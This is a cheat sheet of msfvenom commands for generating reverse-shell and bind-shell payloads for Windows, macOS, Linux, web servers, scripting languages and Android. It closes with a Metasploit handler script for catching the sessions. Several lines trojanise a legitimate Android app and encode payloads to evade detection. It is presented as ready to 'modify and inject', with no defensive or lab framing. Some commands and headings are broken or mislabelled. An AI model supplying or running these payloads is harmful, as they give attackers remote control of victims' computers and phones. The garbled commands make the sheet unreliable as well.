Android and different os payloads easy to modify and inject
Windows Payloads Windows Meterpreter Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe
Windows Reverse Shell
msfvenom -p windows/shell/reverse_tcp lhost=ip-address lport=port -f exe > payload-name.exe
Windows Encoded Meterpreter Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 2 -f exe > payload-name.exe
Windows Meterpreter Reverse Shellcode
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform
macOS Payloads macOS Bind Shell
msfvenom -p osx/x86/shell_bind_tcp rhost=ip-address lport=port-f macho > payload-name.macho
macOS Reverse Shell
msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f macho > payload-name.macho
macOS Reverse TCP Shellcode
msfvenom -p osx/x86/shell_reverse_tcp lhost=ip-address lport=port -f < platform
Linux Payloads Linux Meterpreter TCP Reverse Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f elf > payload-name.elf
Linux Bind TCP Shell
msfvenom -p generic/shell_bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf
Linux Bind Meterpreter TCP Shell
msfvenom -p linux/x86/meterpreter/bind_tcp rhost=ip-address lport=port -f elf > payload-name.elf
Linux Meterpreter Reverse Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=ip-address lport=port -f < platform
Web-base Payloads PHP Meterpreter Reverse Shell
msfvenom -p php/meterpreter_reverse_tcp lhost=ip-address LPORT=port -f raw > payload-name.php
JSP Java Meterpreter Reverse Shell
msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f raw > payload-name.jsp
ASP Meterpreter Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=ip-address lport=port -f asp > payload-nmae.asp
WAR Reverse TCP Shell
msfvenom -p java/jsp_shell_reverse_tcp lhost=ip-address lport=port -f war > payload-name.war
Script-Base Payloads Perl Unix Reverse shell
msfvenom -p cmd/unix/reverse_perl lhost=ip-address lport=port -f raw > payload-name.pl
Bash Unix Reverse Shell
msfvenom -p cmd/unix/reverse_bash lhost=ip-address lport=port -f raw > payload-name.sh
Python Reverse Shell
msfvenom -p cmd/unix/reverse_python lhost=ip-address lport=port -f raw > payload-name.py
Android Payloads Android Meterpreter reverse Payload
msfvenom -p android/meterpreter/reverse_tcp lhost=ip-address lport=port R > payload-name.apk
Android Bind Meterpreter Payload
msfvenom -x app.apk -p android/meterpreter/reverse_tcp lhost=192.168.1.10 lport=4444 -o out.apk
msfvenom --platform android --arch dalvik -x myApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168** LPORT=7777 -o build.apk
#Save AS explort.rc Run command
# msfconsole -q -r 'export.rc'
# nano export.r
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.1.5
set LPORT 5576
set ExitOnSession false
set EnableStageEncoding true
run -j
..........................................read more